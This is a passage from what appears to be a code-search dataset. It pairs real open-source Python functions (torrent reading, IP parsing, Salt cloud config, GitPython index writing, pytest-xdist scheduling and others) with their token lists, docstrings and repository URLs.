WITH_HELP_DESC: prompt += ' - ' + str(node.help).replace('\n', ' ').replace('\r', '') # {:3} sets the field width to three. Gives nice alignment for empty string # values. res = "{:3} {}".format(value_str(sc), prompt) # Don't print the name for unnamed choices (the normal kind) if sc.name is not None: res += " ({})".format(sc.name) return res
[ "def", "node_str", "(", "node", ")", ":", "if", "not", "node", ".", "prompt", ":", "return", "\"\"", "# Even for menu nodes for symbols and choices, it's wrong to check", "# Symbol.visibility / Choice.visibility here. The reason is that a symbol", "# (and a choice, in theory) can be defined in multiple locations, giving it", "# multiple menu nodes, which do not necessarily all have the same prompt", "# visibility. Symbol.visibility / Choice.visibility is calculated as the OR", "# of the visibility of all the prompts.", "prompt", ",", "prompt_cond", "=", "node", ".", "prompt", "if", "not", "expr_value", "(", "prompt_cond", ")", ":", "return", "\"\"", "if", "node", ".", "item", "==", "MENU", ":", "return", "\" \"", "+", "prompt", "if", "node", ".", "item", "==", "COMMENT", ":", "return", "\" *** {} ***\"", ".", "format", "(", "prompt", ")", "# Symbol or Choice", "sc", "=", "node", ".", "item", "if", "sc", ".", "type", "==", "UNKNOWN", ":", "# Skip symbols defined without a type (these are obscure and generate", "# a warning)", "return", "\"\"", "# Add help text", "if", "WITH_HELP_DESC", ":", "prompt", "+=", "' - '", "+", "str", "(", "node", ".", "help", ")", ".", "replace", "(", "'\\n'", ",", "' '", ")", ".", "replace", "(", "'\\r'", ",", "''", ")", "# {:3} sets the field width to three. Gives nice alignment for empty string", "# values.", "res", "=", "\"{:3} {}\"", ".", "format", "(", "value_str", "(", "sc", ")", ",", "prompt", ")", "# Don't print the name for unnamed choices (the normal kind)", "if", "sc", ".", "name", "is", "not", "None", ":", "res", "+=", "\" ({})\"", ".", "format", "(", "sc", ".", "name", ")", "return", "res" ]
Returns the complete menu entry text for a menu node, or "" for invisible menu nodes. Invisible menu nodes are those that lack a prompt or that do not have a satisfied prompt condition. Example return value: "[*] Bool symbol (BOOL)" The symbol name is printed in parentheses to the right of the prompt.
[ "Returns", "the", "complete", "menu", "entry", "text", "for", "a", "menu", "node", "or", "for", "invisible", "menu", "nodes", ".", "Invisible", "menu", "nodes", "are", "those", "that", "lack", "a", "prompt", "or", "that", "do", "not", "have", "a", "satisfied", "prompt", "condition", "." ]
python
train
rndusr/torf
torf/_torrent.py
https://github.com/rndusr/torf/blob/df0363232daacd3f8c91aafddaa0623b8c28cbd2/torf/_torrent.py#L966-L988
def read(cls, filepath, validate=True): """ Read torrent metainfo from file :param filepath: Path of the torrent file :param bool validate: Whether to run :meth:`validate` on the new Torrent object :raises ReadError: if reading from `filepath` fails :raises ParseError: if `filepath` does not contain a valid bencoded byte string :raises MetainfoError: if `validate` is `True` and the read metainfo is invalid :return: New Torrent object """ try: with open(filepath, 'rb') as fh: return cls.read_stream(fh) except (OSError, error.ReadError) as e: raise error.ReadError(e.errno, filepath) except error.ParseError: raise error.ParseError(filepath)
[ "def", "read", "(", "cls", ",", "filepath", ",", "validate", "=", "True", ")", ":", "try", ":", "with", "open", "(", "filepath", ",", "'rb'", ")", "as", "fh", ":", "return", "cls", ".", "read_stream", "(", "fh", ")", "except", "(", "OSError", ",", "error", ".", "ReadError", ")", "as", "e", ":", "raise", "error", ".", "ReadError", "(", "e", ".", "errno", ",", "filepath", ")", "except", "error", ".", "ParseError", ":", "raise", "error", ".", "ParseError", "(", "filepath", ")" ]
Read torrent metainfo from file :param filepath: Path of the torrent file :param bool validate: Whether to run :meth:`validate` on the new Torrent object :raises ReadError: if reading from `filepath` fails :raises ParseError: if `filepath` does not contain a valid bencoded byte string :raises MetainfoError: if `validate` is `True` and the read metainfo is invalid :return: New Torrent object
[ "Read", "torrent", "metainfo", "from", "file" ]
python
train
BernardFW/bernard
src/bernard/platforms/telegram/platform.py
https://github.com/BernardFW/bernard/blob/9c55703e5ffe5717c9fa39793df59dbfa5b4c5ab/src/bernard/platforms/telegram/platform.py#L591-L599
async def _deferred_init(self): """ Register the web hook onto which Telegram should send its messages. """ hook_path = self.make_hook_path() url = urljoin(settings.BERNARD_BASE_URL, hook_path) await self.call('setWebhook', url=url) logger.info('Setting Telegram webhook to "%s"', url)
[ "async", "def", "_deferred_init", "(", "self", ")", ":", "hook_path", "=", "self", ".", "make_hook_path", "(", ")", "url", "=", "urljoin", "(", "settings", ".", "BERNARD_BASE_URL", ",", "hook_path", ")", "await", "self", ".", "call", "(", "'setWebhook'", ",", "url", "=", "url", ")", "logger", ".", "info", "(", "'Setting Telegram webhook to \"%s\"'", ",", "url", ")" ]
Register the web hook onto which Telegram should send its messages.
[ "Register", "the", "web", "hook", "onto", "which", "Telegram", "should", "send", "its", "messages", "." ]
python
train
chrislim2888/IP2Location-Python
IP2Location.py
https://github.com/chrislim2888/IP2Location-Python/blob/6b2a7d3a5e61c9f8efda5ae96c7064f9a7714621/IP2Location.py#L342-L359
def _parse_addr(self, addr): ''' Parses address and returns IP version. Raises exception on invalid argument ''' ipv = 0 try: socket.inet_pton(socket.AF_INET6, addr) # Convert ::FFFF:x.y.z.y to IPv4 if addr.lower().startswith('::ffff:'): try: socket.inet_pton(socket.AF_INET, addr) ipv = 4 except: ipv = 6 else: ipv = 6 except: socket.inet_pton(socket.AF_INET, addr) ipv = 4 return ipv
[ "def", "_parse_addr", "(", "self", ",", "addr", ")", ":", "ipv", "=", "0", "try", ":", "socket", ".", "inet_pton", "(", "socket", ".", "AF_INET6", ",", "addr", ")", "# Convert ::FFFF:x.y.z.y to IPv4", "if", "addr", ".", "lower", "(", ")", ".", "startswith", "(", "'::ffff:'", ")", ":", "try", ":", "socket", ".", "inet_pton", "(", "socket", ".", "AF_INET", ",", "addr", ")", "ipv", "=", "4", "except", ":", "ipv", "=", "6", "else", ":", "ipv", "=", "6", "except", ":", "socket", ".", "inet_pton", "(", "socket", ".", "AF_INET", ",", "addr", ")", "ipv", "=", "4", "return", "ipv" ]
Parses address and returns IP version. Raises exception on invalid argument
[ "Parses", "address", "and", "returns", "IP", "version", ".", "Raises", "exception", "on", "invalid", "argument" ]
python
train
knipknap/exscript
Exscript/stdlib/connection.py
https://github.com/knipknap/exscript/blob/72718eee3e87b345d5a5255be9824e867e42927b/Exscript/stdlib/connection.py#L278-L288
def set_timeout(scope, timeout): """ Defines the time after which Exscript fails if it does not receive a prompt from the remote host. :type timeout: int :param timeout: The timeout in seconds. """ conn = scope.get('__connection__') conn.set_timeout(int(timeout[0])) return True
[ "def", "set_timeout", "(", "scope", ",", "timeout", ")", ":", "conn", "=", "scope", ".", "get", "(", "'__connection__'", ")", "conn", ".", "set_timeout", "(", "int", "(", "timeout", "[", "0", "]", ")", ")", "return", "True" ]
Defines the time after which Exscript fails if it does not receive a prompt from the remote host. :type timeout: int :param timeout: The timeout in seconds.
[ "Defines", "the", "time", "after", "which", "Exscript", "fails", "if", "it", "does", "not", "receive", "a", "prompt", "from", "the", "remote", "host", "." ]
python
train
saltstack/salt
salt/utils/cloud.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/utils/cloud.py#L301-L344
def minion_config(opts, vm_): ''' Return a minion's configuration for the provided options and VM ''' # Don't start with a copy of the default minion opts; they're not always # what we need. Some default options are Null, let's set a reasonable default minion = { 'master': 'salt', 'log_level': 'info', 'hash_type': 'sha256', } # Now, let's update it to our needs minion['id'] = vm_['name'] master_finger = salt.config.get_cloud_config_value('master_finger', vm_, opts) if master_finger is not None: minion['master_finger'] = master_finger minion.update( # Get ANY defined minion settings, merging data, in the following order # 1. VM config # 2. Profile config # 3. Global configuration salt.config.get_cloud_config_value( 'minion', vm_, opts, default={}, search_global=True ) ) make_master = salt.config.get_cloud_config_value('make_master', vm_, opts) if 'master' not in minion and make_master is not True: raise SaltCloudConfigError( 'A master setting was not defined in the minion\'s configuration.' ) # Get ANY defined grains settings, merging data, in the following order # 1. VM config # 2. Profile config # 3. Global configuration minion.setdefault('grains', {}).update( salt.config.get_cloud_config_value( 'grains', vm_, opts, default={}, search_global=True ) ) return minion
[ "def", "minion_config", "(", "opts", ",", "vm_", ")", ":", "# Don't start with a copy of the default minion opts; they're not always", "# what we need. Some default options are Null, let's set a reasonable default", "minion", "=", "{", "'master'", ":", "'salt'", ",", "'log_level'", ":", "'info'", ",", "'hash_type'", ":", "'sha256'", ",", "}", "# Now, let's update it to our needs", "minion", "[", "'id'", "]", "=", "vm_", "[", "'name'", "]", "master_finger", "=", "salt", ".", "config", ".", "get_cloud_config_value", "(", "'master_finger'", ",", "vm_", ",", "opts", ")", "if", "master_finger", "is", "not", "None", ":", "minion", "[", "'master_finger'", "]", "=", "master_finger", "minion", ".", "update", "(", "# Get ANY defined minion settings, merging data, in the following order", "# 1. VM config", "# 2. Profile config", "# 3. Global configuration", "salt", ".", "config", ".", "get_cloud_config_value", "(", "'minion'", ",", "vm_", ",", "opts", ",", "default", "=", "{", "}", ",", "search_global", "=", "True", ")", ")", "make_master", "=", "salt", ".", "config", ".", "get_cloud_config_value", "(", "'make_master'", ",", "vm_", ",", "opts", ")", "if", "'master'", "not", "in", "minion", "and", "make_master", "is", "not", "True", ":", "raise", "SaltCloudConfigError", "(", "'A master setting was not defined in the minion\\'s configuration.'", ")", "# Get ANY defined grains settings, merging data, in the following order", "# 1. VM config", "# 2. Profile config", "# 3. Global configuration", "minion", ".", "setdefault", "(", "'grains'", ",", "{", "}", ")", ".", "update", "(", "salt", ".", "config", ".", "get_cloud_config_value", "(", "'grains'", ",", "vm_", ",", "opts", ",", "default", "=", "{", "}", ",", "search_global", "=", "True", ")", ")", "return", "minion" ]
Return a minion's configuration for the provided options and VM
[ "Return", "a", "minion", "s", "configuration", "for", "the", "provided", "options", "and", "VM" ]
python
train
pyqg/pyqg
pyqg/diagnostic_tools.py
https://github.com/pyqg/pyqg/blob/4f41584a12bcbf8657785b8cb310fa5065ecabd1/pyqg/diagnostic_tools.py#L53-L86
def calc_ispec(model, ph): """Compute isotropic spectrum `phr` of `ph` from 2D spectrum. Parameters ---------- model : pyqg.Model instance The model object from which `ph` originates ph : complex array The field on which to compute the variance Returns ------- kr : array isotropic wavenumber phr : array isotropic spectrum """ if model.kk.max()>model.ll.max(): kmax = model.ll.max() else: kmax = model.kk.max() # create radial wavenumber dkr = np.sqrt(model.dk**2 + model.dl**2) kr = np.arange(dkr/2.,kmax+dkr,dkr) phr = np.zeros(kr.size) for i in range(kr.size): fkr = (model.wv>=kr[i]-dkr/2) & (model.wv<=kr[i]+dkr/2) dth = pi / (fkr.sum()-1) phr[i] = ph[fkr].sum() * kr[i] * dth return kr, phr
[ "def", "calc_ispec", "(", "model", ",", "ph", ")", ":", "if", "model", ".", "kk", ".", "max", "(", ")", ">", "model", ".", "ll", ".", "max", "(", ")", ":", "kmax", "=", "model", ".", "ll", ".", "max", "(", ")", "else", ":", "kmax", "=", "model", ".", "kk", ".", "max", "(", ")", "# create radial wavenumber", "dkr", "=", "np", ".", "sqrt", "(", "model", ".", "dk", "**", "2", "+", "model", ".", "dl", "**", "2", ")", "kr", "=", "np", ".", "arange", "(", "dkr", "/", "2.", ",", "kmax", "+", "dkr", ",", "dkr", ")", "phr", "=", "np", ".", "zeros", "(", "kr", ".", "size", ")", "for", "i", "in", "range", "(", "kr", ".", "size", ")", ":", "fkr", "=", "(", "model", ".", "wv", ">=", "kr", "[", "i", "]", "-", "dkr", "/", "2", ")", "&", "(", "model", ".", "wv", "<=", "kr", "[", "i", "]", "+", "dkr", "/", "2", ")", "dth", "=", "pi", "/", "(", "fkr", ".", "sum", "(", ")", "-", "1", ")", "phr", "[", "i", "]", "=", "ph", "[", "fkr", "]", ".", "sum", "(", ")", "*", "kr", "[", "i", "]", "*", "dth", "return", "kr", ",", "phr" ]
Compute isotropic spectrum `phr` of `ph` from 2D spectrum. Parameters ---------- model : pyqg.Model instance The model object from which `ph` originates ph : complex array The field on which to compute the variance Returns ------- kr : array isotropic wavenumber phr : array isotropic spectrum
[ "Compute", "isotropic", "spectrum", "phr", "of", "ph", "from", "2D", "spectrum", "." ]
python
train
googledatalab/pydatalab
google/datalab/stackdriver/commands/_monitoring.py
https://github.com/googledatalab/pydatalab/blob/d9031901d5bca22fe0d5925d204e6698df9852e1/google/datalab/stackdriver/commands/_monitoring.py#L102-L108
def _monitoring_groups_list(args, _): """Lists the groups in the project.""" project_id = args['project'] pattern = args['name'] or '*' groups = gcm.Groups(context=_make_context(project_id)) dataframe = groups.as_dataframe(pattern=pattern) return _render_dataframe(dataframe)
[ "def", "_monitoring_groups_list", "(", "args", ",", "_", ")", ":", "project_id", "=", "args", "[", "'project'", "]", "pattern", "=", "args", "[", "'name'", "]", "or", "'*'", "groups", "=", "gcm", ".", "Groups", "(", "context", "=", "_make_context", "(", "project_id", ")", ")", "dataframe", "=", "groups", ".", "as_dataframe", "(", "pattern", "=", "pattern", ")", "return", "_render_dataframe", "(", "dataframe", ")" ]
Lists the groups in the project.
[ "Lists", "the", "groups", "in", "the", "project", "." ]
python
train
shoppimon/figcan
figcan/figcan.py
https://github.com/shoppimon/figcan/blob/bdfa59ceed33277c060fc009fbf44c41b9852681/figcan/figcan.py#L109-L130
def _recursive_merge(dct, merge_dct, raise_on_missing): # type: (Dict[str, Any], Dict[str, Any], bool) -> Dict[str, Any] """Recursive dict merge This modifies `dct` in place. Use `copy.deepcopy` if this behavior is not desired. """ for k, v in merge_dct.items(): if k in dct: if isinstance(dct[k], dict) and isinstance(merge_dct[k], BaseMapping): dct[k] = _recursive_merge(dct[k], merge_dct[k], raise_on_missing) else: dct[k] = merge_dct[k] elif isinstance(dct, Extensible): dct[k] = merge_dct[k] else: message = "Unknown configuration key: '{k}'".format(k=k) if raise_on_missing: raise KeyError(message) else: logging.getLogger(__name__).warning(message) return dct
[ "def", "_recursive_merge", "(", "dct", ",", "merge_dct", ",", "raise_on_missing", ")", ":", "# type: (Dict[str, Any], Dict[str, Any], bool) -> Dict[str, Any]", "for", "k", ",", "v", "in", "merge_dct", ".", "items", "(", ")", ":", "if", "k", "in", "dct", ":", "if", "isinstance", "(", "dct", "[", "k", "]", ",", "dict", ")", "and", "isinstance", "(", "merge_dct", "[", "k", "]", ",", "BaseMapping", ")", ":", "dct", "[", "k", "]", "=", "_recursive_merge", "(", "dct", "[", "k", "]", ",", "merge_dct", "[", "k", "]", ",", "raise_on_missing", ")", "else", ":", "dct", "[", "k", "]", "=", "merge_dct", "[", "k", "]", "elif", "isinstance", "(", "dct", ",", "Extensible", ")", ":", "dct", "[", "k", "]", "=", "merge_dct", "[", "k", "]", "else", ":", "message", "=", "\"Unknown configuration key: '{k}'\"", ".", "format", "(", "k", "=", "k", ")", "if", "raise_on_missing", ":", "raise", "KeyError", "(", "message", ")", "else", ":", "logging", ".", "getLogger", "(", "__name__", ")", ".", "warning", "(", "message", ")", "return", "dct" ]
Recursive dict merge This modifies `dct` in place. Use `copy.deepcopy` if this behavior is not desired.
[ "Recursive", "dict", "merge" ]
python
train
Rapptz/discord.py
discord/guild.py
https://github.com/Rapptz/discord.py/blob/05d4f7f9620ef33635d6ac965b26528e09cdaf5b/discord/guild.py#L379-L385
def system_channel(self): """Optional[:class:`TextChannel`]: Returns the guild's channel used for system messages. Currently this is only for new member joins. If no channel is set, then this returns ``None``. """ channel_id = self._system_channel_id return channel_id and self._channels.get(channel_id)
[ "def", "system_channel", "(", "self", ")", ":", "channel_id", "=", "self", ".", "_system_channel_id", "return", "channel_id", "and", "self", ".", "_channels", ".", "get", "(", "channel_id", ")" ]
Optional[:class:`TextChannel`]: Returns the guild's channel used for system messages. Currently this is only for new member joins. If no channel is set, then this returns ``None``.
[ "Optional", "[", ":", "class", ":", "TextChannel", "]", ":", "Returns", "the", "guild", "s", "channel", "used", "for", "system", "messages", "." ]
python
train
Arvedui/picuplib
picuplib/upload.py
https://github.com/Arvedui/picuplib/blob/c8a5d1542dbd421e84afd5ee81fe76efec89fb95/picuplib/upload.py#L183-L223
def upload(apikey, picture, resize=None, rotation='00', noexif=False, callback=None): """ prepares post for regular upload :param str apikey: Apikey needed for Autentication on picflash. :param str/tuple/list picture: Path to picture as str or picture data. \ If data a tuple or list with the file name as str \ and data as byte object in that order. :param str resize: Aresolution in the folowing format: \ '80x80'(optional) :param str|degree rotation: The picture will be rotated by this Value. \ Allowed values are 00, 90, 180, 270.(optional) :param boolean noexif: set to True when exif data should be purged.\ (optional) :param function callback: function witch will be called after every read. \ Need to take one argument. you can use the len function to determine \ the body length and call bytes_read(). """ if isinstance(picture, str): with open(picture, 'rb') as file_obj: picture_name = picture data = file_obj.read() elif isinstance(picture, (tuple, list)): picture_name = picture[0] data = picture[1] else: raise TypeError("The second argument must be str or list/tuple. " "Please refer to the documentation for details.") check_rotation(rotation) check_resize(resize) check_callback(callback) post_data = compose_post(apikey, resize, rotation, noexif) post_data['Datei[]'] = (punify_filename(basename(picture_name)), data) return do_upload(post_data, callback)
[ "def", "upload", "(", "apikey", ",", "picture", ",", "resize", "=", "None", ",", "rotation", "=", "'00'", ",", "noexif", "=", "False", ",", "callback", "=", "None", ")", ":", "if", "isinstance", "(", "picture", ",", "str", ")", ":", "with", "open", "(", "picture", ",", "'rb'", ")", "as", "file_obj", ":", "picture_name", "=", "picture", "data", "=", "file_obj", ".", "read", "(", ")", "elif", "isinstance", "(", "picture", ",", "(", "tuple", ",", "list", ")", ")", ":", "picture_name", "=", "picture", "[", "0", "]", "data", "=", "picture", "[", "1", "]", "else", ":", "raise", "TypeError", "(", "\"The second argument must be str or list/tuple. \"", "\"Please refer to the documentation for details.\"", ")", "check_rotation", "(", "rotation", ")", "check_resize", "(", "resize", ")", "check_callback", "(", "callback", ")", "post_data", "=", "compose_post", "(", "apikey", ",", "resize", ",", "rotation", ",", "noexif", ")", "post_data", "[", "'Datei[]'", "]", "=", "(", "punify_filename", "(", "basename", "(", "picture_name", ")", ")", ",", "data", ")", "return", "do_upload", "(", "post_data", ",", "callback", ")" ]
prepares post for regular upload :param str apikey: Apikey needed for Autentication on picflash. :param str/tuple/list picture: Path to picture as str or picture data. \ If data a tuple or list with the file name as str \ and data as byte object in that order. :param str resize: Aresolution in the folowing format: \ '80x80'(optional) :param str|degree rotation: The picture will be rotated by this Value. \ Allowed values are 00, 90, 180, 270.(optional) :param boolean noexif: set to True when exif data should be purged.\ (optional) :param function callback: function witch will be called after every read. \ Need to take one argument. you can use the len function to determine \ the body length and call bytes_read().
[ "prepares", "post", "for", "regular", "upload" ]
python
train
SylvanasSun/FishFishJump
fish_searcher/views/search.py
https://github.com/SylvanasSun/FishFishJump/blob/696212d242d8d572f3f1b43925f3d8ab8acc6a2d/fish_searcher/views/search.py#L131-L147
def generate_key(url, page_number): """ >>> url_a = 'http://localhost:5009/search?keywords=a' >>> generate_key(url_a, 10) 'http://localhost:5009/search?keywords=a&page=10' >>> url_b = 'http://localhost:5009/search?keywords=b&page=1' >>> generate_key(url_b, 10) 'http://localhost:5009/search?keywords=b&page=10' """ index = url.rfind('page') if index != -1: result = url[0:index] result += 'page=%s' % page_number else: result = url result += '&page=%s' % page_number return result
[ "def", "generate_key", "(", "url", ",", "page_number", ")", ":", "index", "=", "url", ".", "rfind", "(", "'page'", ")", "if", "index", "!=", "-", "1", ":", "result", "=", "url", "[", "0", ":", "index", "]", "result", "+=", "'page=%s'", "%", "page_number", "else", ":", "result", "=", "url", "result", "+=", "'&page=%s'", "%", "page_number", "return", "result" ]
>>> url_a = 'http://localhost:5009/search?keywords=a' >>> generate_key(url_a, 10) 'http://localhost:5009/search?keywords=a&page=10' >>> url_b = 'http://localhost:5009/search?keywords=b&page=1' >>> generate_key(url_b, 10) 'http://localhost:5009/search?keywords=b&page=10'
[ ">>>", "url_a", "=", "http", ":", "//", "localhost", ":", "5009", "/", "search?keywords", "=", "a", ">>>", "generate_key", "(", "url_a", "10", ")", "http", ":", "//", "localhost", ":", "5009", "/", "search?keywords", "=", "a&page", "=", "10", ">>>", "url_b", "=", "http", ":", "//", "localhost", ":", "5009", "/", "search?keywords", "=", "b&page", "=", "1", ">>>", "generate_key", "(", "url_b", "10", ")", "http", ":", "//", "localhost", ":", "5009", "/", "search?keywords", "=", "b&page", "=", "10" ]
python
train
gitpython-developers/GitPython
git/index/fun.py
https://github.com/gitpython-developers/GitPython/blob/1f66e25c25cde2423917ee18c4704fff83b837d1/git/index/fun.py#L111-L156
def write_cache(entries, stream, extension_data=None, ShaStreamCls=IndexFileSHA1Writer): """Write the cache represented by entries to a stream :param entries: **sorted** list of entries :param stream: stream to wrap into the AdapterStreamCls - it is used for final output. :param ShaStreamCls: Type to use when writing to the stream. It produces a sha while writing to it, before the data is passed on to the wrapped stream :param extension_data: any kind of data to write as a trailer, it must begin a 4 byte identifier, followed by its size ( 4 bytes )""" # wrap the stream into a compatible writer stream = ShaStreamCls(stream) tell = stream.tell write = stream.write # header version = 2 write(b"DIRC") write(pack(">LL", version, len(entries))) # body for entry in entries: beginoffset = tell() write(entry[4]) # ctime write(entry[5]) # mtime path = entry[3] path = force_bytes(path, encoding=defenc) plen = len(path) & CE_NAMEMASK # path length assert plen == len(path), "Path %s too long to fit into index" % entry[3] flags = plen | (entry[2] & CE_NAMEMASK_INV) # clear possible previous values write(pack(">LLLLLL20sH", entry[6], entry[7], entry[0], entry[8], entry[9], entry[10], entry[1], flags)) write(path) real_size = ((tell() - beginoffset + 8) & ~7) write(b"\0" * ((beginoffset + real_size) - tell())) # END for each entry # write previously cached extensions data if extension_data is not None: stream.write(extension_data) # write the sha over the content stream.write_sha()
[ "def", "write_cache", "(", "entries", ",", "stream", ",", "extension_data", "=", "None", ",", "ShaStreamCls", "=", "IndexFileSHA1Writer", ")", ":", "# wrap the stream into a compatible writer", "stream", "=", "ShaStreamCls", "(", "stream", ")", "tell", "=", "stream", ".", "tell", "write", "=", "stream", ".", "write", "# header", "version", "=", "2", "write", "(", "b\"DIRC\"", ")", "write", "(", "pack", "(", "\">LL\"", ",", "version", ",", "len", "(", "entries", ")", ")", ")", "# body", "for", "entry", "in", "entries", ":", "beginoffset", "=", "tell", "(", ")", "write", "(", "entry", "[", "4", "]", ")", "# ctime", "write", "(", "entry", "[", "5", "]", ")", "# mtime", "path", "=", "entry", "[", "3", "]", "path", "=", "force_bytes", "(", "path", ",", "encoding", "=", "defenc", ")", "plen", "=", "len", "(", "path", ")", "&", "CE_NAMEMASK", "# path length", "assert", "plen", "==", "len", "(", "path", ")", ",", "\"Path %s too long to fit into index\"", "%", "entry", "[", "3", "]", "flags", "=", "plen", "|", "(", "entry", "[", "2", "]", "&", "CE_NAMEMASK_INV", ")", "# clear possible previous values", "write", "(", "pack", "(", "\">LLLLLL20sH\"", ",", "entry", "[", "6", "]", ",", "entry", "[", "7", "]", ",", "entry", "[", "0", "]", ",", "entry", "[", "8", "]", ",", "entry", "[", "9", "]", ",", "entry", "[", "10", "]", ",", "entry", "[", "1", "]", ",", "flags", ")", ")", "write", "(", "path", ")", "real_size", "=", "(", "(", "tell", "(", ")", "-", "beginoffset", "+", "8", ")", "&", "~", "7", ")", "write", "(", "b\"\\0\"", "*", "(", "(", "beginoffset", "+", "real_size", ")", "-", "tell", "(", ")", ")", ")", "# END for each entry", "# write previously cached extensions data", "if", "extension_data", "is", "not", "None", ":", "stream", ".", "write", "(", "extension_data", ")", "# write the sha over the content", "stream", ".", "write_sha", "(", ")" ]
Write the cache represented by entries to a stream :param entries: **sorted** list of entries :param stream: stream to wrap into the AdapterStreamCls - it is used for final output. :param ShaStreamCls: Type to use when writing to the stream. It produces a sha while writing to it, before the data is passed on to the wrapped stream :param extension_data: any kind of data to write as a trailer, it must begin a 4 byte identifier, followed by its size ( 4 bytes )
[ "Write", "the", "cache", "represented", "by", "entries", "to", "a", "stream" ]
python
train
pytest-dev/pytest-xdist
xdist/scheduler/loadscope.py
https://github.com/pytest-dev/pytest-xdist/blob/9fcf8fa636bc69ee6cac9348a6ec20c87f2bb5e4/xdist/scheduler/loadscope.py#L322-L380
def schedule(self): """Initiate distribution of the test collection. Initiate scheduling of the items across the nodes. If this gets called again later it behaves the same as calling ``._reschedule()`` on all nodes so that newly added nodes will start to be used. If ``.collection_is_completed`` is True, this is called by the hook: - ``DSession.worker_collectionfinish``. """ assert self.collection_is_completed # Initial distribution already happened, reschedule on all nodes if self.collection is not None: for node in self.nodes: self._reschedule(node) return # Check that all nodes collected the same tests if not self._check_nodes_have_same_collection(): self.log("**Different tests collected, aborting run**") return # Collections are identical, create the final list of items self.collection = list(next(iter(self.registered_collections.values()))) if not self.collection: return # Determine chunks of work (scopes) for nodeid in self.collection: scope = self._split_scope(nodeid) work_unit = self.workqueue.setdefault(scope, default=OrderedDict()) work_unit[nodeid] = False # Avoid having more workers than work extra_nodes = len(self.nodes) - len(self.workqueue) if extra_nodes > 0: self.log("Shuting down {0} nodes".format(extra_nodes)) for _ in range(extra_nodes): unused_node, assigned = self.assigned_work.popitem(last=True) self.log("Shuting down unused node {0}".format(unused_node)) unused_node.shutdown() # Assign initial workload for node in self.nodes: self._assign_work_unit(node) # Ensure nodes start with at least two work units if possible (#277) for node in self.nodes: self._reschedule(node) # Initial distribution sent all tests, start node shutdown if not self.workqueue: for node in self.nodes: node.shutdown()
[ "def", "schedule", "(", "self", ")", ":", "assert", "self", ".", "collection_is_completed", "# Initial distribution already happened, reschedule on all nodes", "if", "self", ".", "collection", "is", "not", "None", ":", "for", "node", "in", "self", ".", "nodes", ":", "self", ".", "_reschedule", "(", "node", ")", "return", "# Check that all nodes collected the same tests", "if", "not", "self", ".", "_check_nodes_have_same_collection", "(", ")", ":", "self", ".", "log", "(", "\"**Different tests collected, aborting run**\"", ")", "return", "# Collections are identical, create the final list of items", "self", ".", "collection", "=", "list", "(", "next", "(", "iter", "(", "self", ".", "registered_collections", ".", "values", "(", ")", ")", ")", ")", "if", "not", "self", ".", "collection", ":", "return", "# Determine chunks of work (scopes)", "for", "nodeid", "in", "self", ".", "collection", ":", "scope", "=", "self", ".", "_split_scope", "(", "nodeid", ")", "work_unit", "=", "self", ".", "workqueue", ".", "setdefault", "(", "scope", ",", "default", "=", "OrderedDict", "(", ")", ")", "work_unit", "[", "nodeid", "]", "=", "False", "# Avoid having more workers than work", "extra_nodes", "=", "len", "(", "self", ".", "nodes", ")", "-", "len", "(", "self", ".", "workqueue", ")", "if", "extra_nodes", ">", "0", ":", "self", ".", "log", "(", "\"Shuting down {0} nodes\"", ".", "format", "(", "extra_nodes", ")", ")", "for", "_", "in", "range", "(", "extra_nodes", ")", ":", "unused_node", ",", "assigned", "=", "self", ".", "assigned_work", ".", "popitem", "(", "last", "=", "True", ")", "self", ".", "log", "(", "\"Shuting down unused node {0}\"", ".", "format", "(", "unused_node", ")", ")", "unused_node", ".", "shutdown", "(", ")", "# Assign initial workload", "for", "node", "in", "self", ".", "nodes", ":", "self", ".", "_assign_work_unit", "(", "node", ")", "# Ensure nodes start with at least two work units if possible (#277)", "for", "node", "in", "self", ".", "nodes", ":", "self", ".", "_reschedule", "(", "node", ")", "# Initial distribution sent all tests, start node shutdown", "if", "not", "self", ".", "workqueue", ":", "for", "node", "in", "self", ".", "nodes", ":", "node", ".", "shutdown", "(", ")" ]
Initiate distribution of the test collection. Initiate scheduling of the items across the nodes. If this gets called again later it behaves the same as calling ``._reschedule()`` on all nodes so that newly added nodes will start to be used. If ``.collection_is_completed`` is True, this is called by the hook: - ``DSession.worker_collectionfinish``.
[ "Initiate", "distribution", "of", "the", "test", "collection", "." ]
python
train
saltstack/salt
salt/modules/network.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/network.py#L270-L283
def _ppid(): ''' Return a dict of pid to ppid mappings ''' ret = {} if __grains__['kernel'] == 'SunOS': cmd = 'ps -a -o pid,ppid | tail +2' else: cmd = 'ps -ax -o pid,ppid | tail -n+2' out = __salt__['cmd.run'](cmd, python_shell=True) for line in out.splitlines(): pid, ppid = line.split() ret[pid] = ppid return ret
[ "def", "_ppid", "(", ")", ":", "ret", "=", "{", "}", "if", "__grains__", "[", "'kernel'", "]", "==", "'SunOS'", ":", "cmd", "=", "'ps -a -o pid,ppid | tail +2'", "else", ":", "cmd", "=", "'ps -ax -o pid,ppid | tail -n+2'", "out", "=", "__salt__", "[", "'cmd.run'", "]", "(", "cmd", ",", "python_shell", "=", "True", ")", "for", "line", "in", "out", ".", "splitlines", "(", ")", ":", "pid", ",", "ppid", "=", "line", ".", "split", "(", ")", "ret", "[", "pid", "]", "=", "ppid", "return", "ret" ]
Return a dict of pid to ppid mappings
[ "Return", "a", "dict", "of", "pid", "to", "ppid", "mappings" ]
python
train
odlgroup/odl
odl/space/pspace.py
https://github.com/odlgroup/odl/blob/b8443f6aca90e191ba36c91d32253c5a36249a6c/odl/space/pspace.py#L372-L388
def dtype(self): """The data type of this space. This is only well defined if all subspaces have the same dtype. Raises ------ AttributeError If any of the subspaces does not implement `dtype` or if the dtype of the subspaces does not match. """ dtypes = [space.dtype for space in self.spaces] if all(dtype == dtypes[0] for dtype in dtypes): return dtypes[0] else: raise AttributeError("`dtype`'s of subspaces not equal")
[ "def", "dtype", "(", "self", ")", ":", "dtypes", "=", "[", "space", ".", "dtype", "for", "space", "in", "self", ".", "spaces", "]", "if", "all", "(", "dtype", "==", "dtypes", "[", "0", "]", "for", "dtype", "in", "dtypes", ")", ":", "return", "dtypes", "[", "0", "]", "else", ":", "raise", "AttributeError", "(", "\"`dtype`'s of subspaces not equal\"", ")" ]
The data type of this space. This is only well defined if all subspaces have the same dtype. Raises ------ AttributeError If any of the subspaces does not implement `dtype` or if the dtype of the subspaces does not match.
[ "The", "data", "type", "of", "this", "space", "." ]
python
train
automl/HpBandSter
hpbandster/examples/plot_example_7_interactive_plot.py
